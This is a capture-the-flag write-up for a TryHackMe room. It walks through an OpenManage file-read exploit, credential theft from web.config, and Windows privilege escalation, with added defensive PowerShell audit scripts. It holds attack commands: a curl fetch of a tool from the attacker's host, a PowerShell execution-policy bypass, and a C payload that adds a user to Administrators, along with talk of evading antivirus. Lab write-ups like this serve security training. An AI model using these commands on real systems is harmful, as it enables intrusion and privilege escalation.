Hack Smarter Security | TryHackMe Write-up
Hey, I am back with another write-up. Try this room and many more at TryHackMe!!!
NMAP Scan
nmap [IP] -sV -T5
We get five open ports: 21, 22, 80, 1311 and 3389.
PORT 21
Anonymous login is allowed, and we find two files: a text file and a PNG.
The text file contains credit card information.
Port 80 and 1311
First, let's look at port 80.
Let's try directory enumeration:
gobuster dir -u [URL] -w /path/to/wordlist
Nothing interesting was found there. Let's try port 1311.
Let's switch to https://IP:1311
Great, we are dealing with Dell EMC OpenManage and have a login page in front of us, but let's take a look around first.
About (see footer) tells us that we are dealing with version 9.4.0.2.
Exploit
Found the exploit CVE-2020-5377 on exploit-db.
Take a look at this post to learn more about the vulnerability.
The exploit-db script was not working, so I tried this script.
We are now able to retrieve files from the system. We start with C:\Windows\win.ini, a file that is present and readable on every Windows system, which lets us test whether the exploit actually works. We know that RDP and SSH are accessible (see the Nmap scan), so we are looking for credentials.
A good place for these is usually the web.config of the IIS application. We would expect the config at
C:\inetpub\wwwroot\application\web.config. We know from our Nmap scan that the HTTP title corresponds to the domain name, so this is possibly the application name. When we request \inetpub\wwwroot\hacksmartersec\web.config, we get its content and thus the credentials for the user Tyler.
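As an added hardening example (my own code, not part of the write-up or the Dell/Microsoft tooling): the file-read bug is fixed by patching OpenManage, but the damage came from the fact that web.config held a usable OS account password in cleartext. The script below encrypts the credential-bearing sections of an IIS application's web.config with the DPAPI provider via aspnet_regiis and then checks that no cleartext password remains. It assumes a .NET Framework 4.x application running in a 64-bit worker process and uses the application path C:\inetpub\wwwroot\hacksmartersec from the write-up; the section list is an assumption.

```powershell
# Added example, not from the original write-up. Encrypts the secret-bearing sections
# of an IIS application's web.config so an arbitrary-file-read bug like the one above
# yields only machine-bound ciphertext. Run from an elevated PowerShell on the web server.
# Assumptions: .NET Framework 4.x app, 64-bit app pool, path taken from the write-up.

$AppPath  = 'C:\inetpub\wwwroot\hacksmartersec'                              # from the write-up
$RegIIS   = "$env:windir\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
$Sections = @('connectionStrings', 'appSettings')                            # assumed section list

function Protect-WebConfigSecrets {
    param([string]$Path = $AppPath)
    [xml]$xml = Get-Content (Join-Path $Path 'web.config')
    foreach ($s in $Sections) {
        # aspnet_regiis fails on a section that does not exist, so skip those.
        if ($null -eq $xml.configuration.$s) { continue }
        # -pef encrypts a section by physical path; DataProtectionConfigurationProvider
        # ties the key to this machine, so the ciphertext is useless when read elsewhere.
        & $RegIIS -pef $s $Path -prov DataProtectionConfigurationProvider
        if ($LASTEXITCODE -ne 0) { throw "aspnet_regiis failed on section '$s'" }
    }
}

function Test-WebConfigPlaintext {
    param([string]$Path = $AppPath)
    # Returns config lines that still look like cleartext credentials after encryption.
    $config = Join-Path $Path 'web.config'
    Select-String -Path $config -Pattern 'password\s*=|pwd\s*=' |
        Where-Object { $_.Line -notmatch 'EncryptedData' }
}

Protect-WebConfigSecrets
$left = Test-WebConfigPlaintext
if ($left) { Write-Warning "Plaintext credentials remain:`n$($left.Line -join "`n")" }
else       { Write-Host 'No plaintext credentials found in web.config.' }
```

Encrypting the file limits what a file read yields, but the stronger fix is to keep OS account credentials out of web.config entirely (use the application pool identity or a dedicated low-privilege service account that cannot log in over SSH or RDP), so a leaked application secret does not become a shell on the box.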
We were able to log in via SSH with those credentials.
We looked for user.txt and found it.
For privilege escalation we will use PrivescCheck: https://github.com/itm4n/PrivescCheck
We serve it over HTTP from our own system as below:
python2 -m SimpleHTTPServer 1234
and fetch the script on the target machine with curl:
curl http://10.9.1.214:1234/PrivescCheck.ps1 -o PrivescCheck.ps1
Use the command below to run the script. It takes some time to complete.
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
We find a very likely vulnerability, rated high: the spoofer-scheduler service can be started and stopped by a normal user, and it runs as LocalSystem. If we replace the executable of the service, e.g. with a reverse shell or an executable that creates an admin account for us, we can escalate our privileges.
We confirm that we can write to C:\Program Files (x86)\Spoofer. We now need a reverse shell executable that is not recognized by Windows Defender; a simple msfvenom payload gets detected and deleted easily.
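The finding above is a classic weak service configuration, and the same check PrivescCheck runs is easy to do yourself as an admin audit. The script below is an added example (my own code, not PrivescCheck's and not part of the write-up): it lists LocalSystem services whose executable directory grants write access to low-privileged groups, shows how to tighten the directory ACL with icacls, and pulls the Service Control Manager stop/start events (ID 7036) that a swap like the one described here leaves in the System log. The service name spoofer-scheduler comes from the write-up; the principal list and rights mask are assumptions.

```powershell
# Added example, not from the original write-up or from PrivescCheck. Audit, fix and
# detect the weak service configuration described above. Run from an elevated PowerShell.

$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')  # assumed list
$WriteRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted or unquoted and may carry arguments; return just the executable.
    if ($PathName -match '^"([^"]+)"')  { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $null
}

function Find-WritableServiceDirs {
    # Emits one object per LocalSystem service whose binary directory is writable
    # by a low-privileged principal. This is the condition the write-up abused.
    Get-CimInstance Win32_Service |
      Where-Object { $_.StartName -in @('LocalSystem', 'NT AUTHORITY\SYSTEM') } |
      ForEach-Object {
        $exe = Get-ServiceBinaryPath $_.PathName
        if (-not $exe) { return }
        $dir = Split-Path -Parent $exe
        if (-not (Test-Path -LiteralPath $dir)) { return }
        $bad = (Get-Acl -LiteralPath $dir).Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $LowPrivPrincipals -contains $_.IdentityReference.Value -and
            (($_.FileSystemRights -band $WriteRights) -ne 0)
        }
        if ($bad) {
            [pscustomobject]@{
                Service   = $_.Name
                RunsAs    = $_.StartName
                Directory = $dir
                GrantedTo = ($bad.IdentityReference.Value | Sort-Object -Unique) -join ', '
            }
        }
      }
}

function Repair-ServiceDirAcl {
    param([Parameter(Mandatory)][string]$Directory)
    # Stop inheriting, keep existing entries as explicit ACEs, then reduce the
    # low-privileged groups to read-and-execute so the binary can no longer be replaced.
    icacls $Directory /inheritance:d | Out-Null
    foreach ($p in @('Everyone', 'Users', 'Authenticated Users')) {
        icacls $Directory /remove:g "$p"          | Out-Null
        icacls $Directory /grant:r "${p}:(OI)(CI)RX" | Out-Null
    }
}

function Get-ServiceStateChanges {
    param([string]$ServiceName = 'spoofer-scheduler', [int]$Hours = 24)   # name from the write-up
    # Event 7036 records each stop/start transition. A stop followed by a start of a
    # LocalSystem service, outside maintenance, is the trace a binary swap leaves behind.
    Get-WinEvent -FilterHashtable @{
        LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7036
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
      Where-Object { $_.Message -like "*$ServiceName*" } |
      Select-Object TimeCreated, Message
}

# Usage: audit first, then repair each flagged directory and review recent transitions.
$findings = Find-WritableServiceDirs
$findings | Format-Table -AutoSize
foreach ($f in $findings) { Repair-ServiceDirAcl -Directory $f.Directory }
Get-ServiceStateChanges | Format-Table -AutoSize
```

Two caveats: the directory ACL is only half of the finding. The service's own security descriptor also lets a normal user stop and start it, which should be tightened as well (Set-Service -SecurityDescriptorSddl on PowerShell 7, or sc sdset), and the audit above does not check for a hash of the binary changing on disk, so pair it with file integrity monitoring on service directories.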
Instead, I chose to create an executable that adds the Tyler user to the local Administrators group.
A very simple C program does this:
#include <stdlib.h>

/* When the service starts this binary it runs as LocalSystem, so the net command succeeds. */
int main(void) {
    system("cmd.exe /c net localgroup Administrators tyler /add");
    return 0;
}
Now compile it into a Windows executable:
x86_64-w64-mingw32-gcc-win32 payload.c -o payload.exe
Now we stop the scheduler:
sc stop spoofer-scheduler
Now we rename the original executable, upload our executable in its place and execute it.
After logging in again, I was a member of the Administrators group.
We were able to read Hacking-targets.txt.
The room was nice; I enjoyed doing it.
Happy Hacking!